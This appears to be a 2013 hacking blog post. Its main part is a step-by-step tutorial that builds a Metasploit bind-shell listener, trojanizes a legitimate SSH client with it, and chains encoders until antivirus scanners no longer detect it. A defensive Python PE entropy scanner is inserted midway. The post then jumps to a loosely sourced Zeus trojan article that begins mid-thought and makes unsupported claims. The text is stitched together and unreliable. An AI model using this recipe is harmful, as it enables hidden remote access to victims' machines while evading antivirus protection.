Tuesday, 11 June 2013

How To Bypass Antivirus Detection: Making an Exe FUD

Notice !!!
This post is only for educational purposes; the author of this post is not responsible for any misuse.

You need a BackTrack machine, real or virtual. I used BackTrack 5 R3, but other versions of BackTrack work OK too.

Antivirus protects machines from malware, but not from all of it. There are ways to pack malware so that it is harder to detect. We'll use Metasploit to render malware completely invisible to antivirus.

Creating a Listener:

This is a simple payload that gives the attacker remote control of a machine. It is not a virus and won't spread, but it is detected by antivirus engines. In BackTrack, in a Terminal window, execute these commands:

msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe

You should see the listen.exe file as shown below: 

Analyzing the Listener with VirusTotal

On the VirusTotal web page, click the "Choose File" button. Navigate to /root and double-click listen.exe. "listen.exe" appears in the "Choose File" box, as shown below:

On the VirusTotal web page, click the "Scan it" button.
If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that many of the antivirus engines detected the file: 33 out of 42 when I did it, as shown below. You may see different numbers, but many of the engines should detect it.

Encoding the Listener 

This process encodes the listener and inserts it into an innocent SSH client executable.
In BackTrack, in a Terminal window, execute these commands:

wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe
msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1
ls -l evil*

You should see the evil_ssh.exe file as shown below:

Scanning with VirusTotal

Upload /root/evil_ssh.exe to VirusTotal the same way. If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that fewer of the antivirus engines detect the file now: 21 out of 42 when I did it, as shown below. You may see different numbers.


Encoding the Listener Again

This process encodes the listener several times, each pass with a different encoder.

In BackTrack, in a Terminal window, execute these commands:
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1
ls -l listen*

You should see several files as shown below:

Analyzing Again

Upload /root/listen5.exe to VirusTotal again. The analysis shows that fewer still of the antivirus engines detect the file now: 0 out of 42 when I did it, as shown below. You may see different numbers.
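The VirusTotal counts above only measure static signature detection on the day of the scan. A defender-side heuristic that does not depend on signatures is to inspect the executable's structure: the encoders used above leave a high-entropy blob of bytes, and an executable that has had code injected into it often carries a section that is both writable and executable. The following Python script is an added example, not part of the original post; it parses the PE section table, flags such sections, and runs against a small constructed PE image. The 7.0-bit threshold and the section name .data2 are assumptions for the demonstration.

```python
import hashlib
import math
import struct
from collections import Counter

IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x80000000  # section Characteristics bits

def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def parse_sections(pe):
    """Walk the PE section table; returns (name, characteristics, raw bytes) per section."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size  # section headers follow the optional header
    sections = []
    for off in range(table, table + 40 * nsec, 40):
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append((name, chars, pe[raw_ptr:raw_ptr + raw_size]))
    return sections

def suspicious_sections(pe, threshold=7.0):
    """Flag sections that look encoded (entropy above an assumed 7.0-bit cut-off) or are W+X."""
    hits = []
    for name, chars, data in parse_sections(pe):
        reasons = []
        if shannon_entropy(data) > threshold:
            reasons.append("high-entropy")
        if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
            reasons.append("writable+executable")
        if reasons:
            hits.append((name, reasons))
    return hits

def build_sample_pe():
    """Constructed minimal PE (no optional header): plain .text plus a random-looking W+X section."""
    text = b"\x90" * 511 + b"\xc3"                                              # near-constant, low entropy
    blob = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(32))    # 1024 random-looking bytes
    hdr = lambda name, va, data, ptr, chars: struct.pack("<8sIIIIIIHHI", name, len(data), va, len(data), ptr, 0, 0, 0, 0, chars)
    image = bytearray(b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 64))          # DOS header, e_lfanew = 64
    image += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x0102)    # COFF header, 2 sections
    image += hdr(b".text", 0x1000, text, 0x200, 0x60000020) + hdr(b".data2", 0x2000, blob, 0x400, 0xE0000040)
    image += bytes(0x200 - len(image)) + text + blob                           # raw data at 0x200 and 0x400
    return bytes(image)
```

Compressed resources and embedded certificates also score high on entropy, so treat a hit as a reason to look closer or run the file in a sandbox, not as a verdict.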

How Can Your Bank Account Be Stolen With the Zeus Virus?

Zeus is a Trojan horse that steals banking information by man-in-the-browser keystroke logging and form grabbing. Zeus is spread mainly through drive-by downloads and phishing schemes. First identified in July 2007 when it was used to steal information from the United States Department of Transportation, it became more widespread in March 2009. In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies as Bank of America, NASA, Monster.com, ABC, Oracle, Play.com, Cisco, Amazon, and BusinessWeek.
That fake page could then ask for your security information and other important data that could easily be sold on the black market.
According to many sources, it has reportedly been confirmed that those pages are hosted by the Russian Mafia (also known as the Russian Business Network).
Did Facebook Take Action Against It?
The founder of the advocacy group Fans Against Kounterfeit Enterprise (FAKE) said that he tried to alert Facebook about this issue so that it would take action as soon as possible, but unluckily he was not satisfied with their response.

Windows users should be especially careful about this issue. It has been said that Windows devices are heavily infected with this virus; Mac OS X and Linux are said to be still safe from it.

Some countries, like the USA and the UK, are badly infected, while India, Russia, Canada and France are infected to a moderate degree. Other countries, like Australia, Argentina, Brazil, South Africa, Chile, Saudi Arabia, Pakistan, Indonesia and some other South-East Asian and European countries, are less affected by this virus.


The Zeus virus can propagate through phishing messages sent from an account that was already compromised by phishing. That phished account starts sending messages to your friends containing links to ads, asking them to simply check out a video or product by clicking the links. This way the virus goes viral.

Readers should refrain from clicking such links, because they might end up with their accounts compromised. The virus is sophisticated enough to replace a bank's website with a mimicked page of its own.

Facebook is aware of it, but it is unlikely that Facebook is going to take any action against it.

Regards: By Anshuman Kak